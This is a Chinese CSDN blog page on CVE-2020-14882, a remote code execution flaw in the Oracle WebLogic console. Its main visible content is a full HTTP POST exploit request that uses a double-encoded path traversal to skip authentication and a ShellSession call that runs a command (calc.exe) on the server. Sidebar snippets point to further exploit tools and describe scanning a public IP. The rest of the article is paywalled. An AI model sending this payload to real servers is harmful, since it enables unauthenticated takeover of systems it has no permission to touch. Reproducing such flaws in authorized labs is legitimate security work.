CVE-2020–14882 Weblogic RCE

最新推荐文章于 2024-07-05 14:45:10 发布
最新推荐文章于 2024-07-05 14:45:10 发布
阅读量572 收藏 1
点赞数
分类专栏: web安全攻防详解 文章标签: weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34236803/article/details/109373720
版权
本文详细介绍了CVE-2020-14882,这是一个针对Weblogic服务器的远程代码执行(RCE)漏洞。内容包括ShellSession的有效载荷、不同ApplicationContext的利用方式,如FileSystemXmlApplicationContext和ClassPathXmlApplicationContext,并提供了poc.xml等参考链接,展示了仅通过GET请求即可触发漏洞的情况。
摘要由CSDN通过智能技术生成

CVE-2020–14882 Weblogic RCE

ShellSession

coherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSession
有效载荷
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.getRuntime.exec('calc.exe');");
了解本专栏 订阅专栏 解锁全文 超级会员免费看
吾爱测试
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
推特: 1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-...
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6135
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 472
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
最新发布
2301_77132421的博客
07-05 795
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。
Weblogic Server RCECVE-2020-14882CVE-2020-14883)复现
weixin_42558965的博客
01-07 788
复现场景:docker、CentOS7、windows物理机 浮现过程: 使用vulhub-master配合docker搭建,进入weblogic/CVE-2020-14882文件夹下搭建环境: docker-compose up -d 成功搭建后在物理机上访问靶机IP+端口(默认7001),如下图所示: 访问靶机IP+端口(默认7001)/console如下图所示: 首先复现CVE-2020-14882绕过验证权限漏洞: 访问URL: http://靶机IP:7001/console/css/%25
CVE-2020-14882_ALL综合利用工具
网络安全。
12-07 2509
简介 CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块:requests、http.client (工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。) 命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 工具地址:https://github.com/GGyao/CVE-2020-14882_ALL(喜欢的点个star喔) 选项 功能一:命令回显 python3 CVE-20
CVE-2020-14882 Oracle WebLogic远程命令执行漏洞
dearya123的博客
06-28 2796
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 多版本存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server,受影响版本如下: 10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本,
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
CVE-2017-10271:CVE-2017-10271 WEBLOGIC RCE(已测试)
04-27
CVE-2017-10271 用法:CVE-2017-12149.py targetip WEBLOGIC RCE仅适用于Windows,您可以为Linux编辑一点代码。
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
weblogicrce poc
12-21
weblogicrce 测试脚本,使用该工具可以对weblogicrce服务进行检测和利用
CVE-2020-14882 weblogic 未授权命令执行复现
weixin_37104668的博客
12-06 470
Weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(applicati
CVE-2020-14882【vulhub weblogic漏洞复现】
weixin_65722679的博客
07-04 239
CVE-2020-14882【vulhub weblogic漏洞复现】
Weblogic RCE合集
Aiwin的博客
05-09 1329
Weblogic RCE合集
Weblogic漏洞 - Weblogic 弱口令漏洞
HAKUNAMATATATTA的博客
12-02 2015
WebLogic Server 是美国甲骨文( Oracle )公司开发的一款适用于云环境和传统环境的应用服务中间件,确切的说是一个基于 JavaEE 架构的中间件,它提供了一个现代轻型开发平台,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。将Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
windows10下Weblogic官网下载与安装教程
weixin_43607015的博客
06-20 4783
一、官网下载安装包 1、安装包官网下载链接:https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html 2、选择下图版本安装(没有oracle账号的可能需要注册一个才能下载(免费的)) 二、解压安装包 1、解压安装包,得到fmw_12.2.1.3.0_wls.jar 2、环境要求:一定要是jdk1.8的...
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现
蚁景网安学院
12-08 2293
亲爱的,关注我吧12/8本文字数2498来和我一起阅读吧本文涉及靶场知识点-CVE-2020-14882&14883 weblogic未授权访问漏洞https://www.het...
vulhub漏洞—weblogic RCE
weixin_45808483的博客
12-02 1100
一开始只知道一个IP 212.129.248.63 使用nmap扫描开放的端口 经过尝试我们发现 7001 端口是我们的要打的靶机漏洞 使用 Xary 扫描 xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html 漏洞利用 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值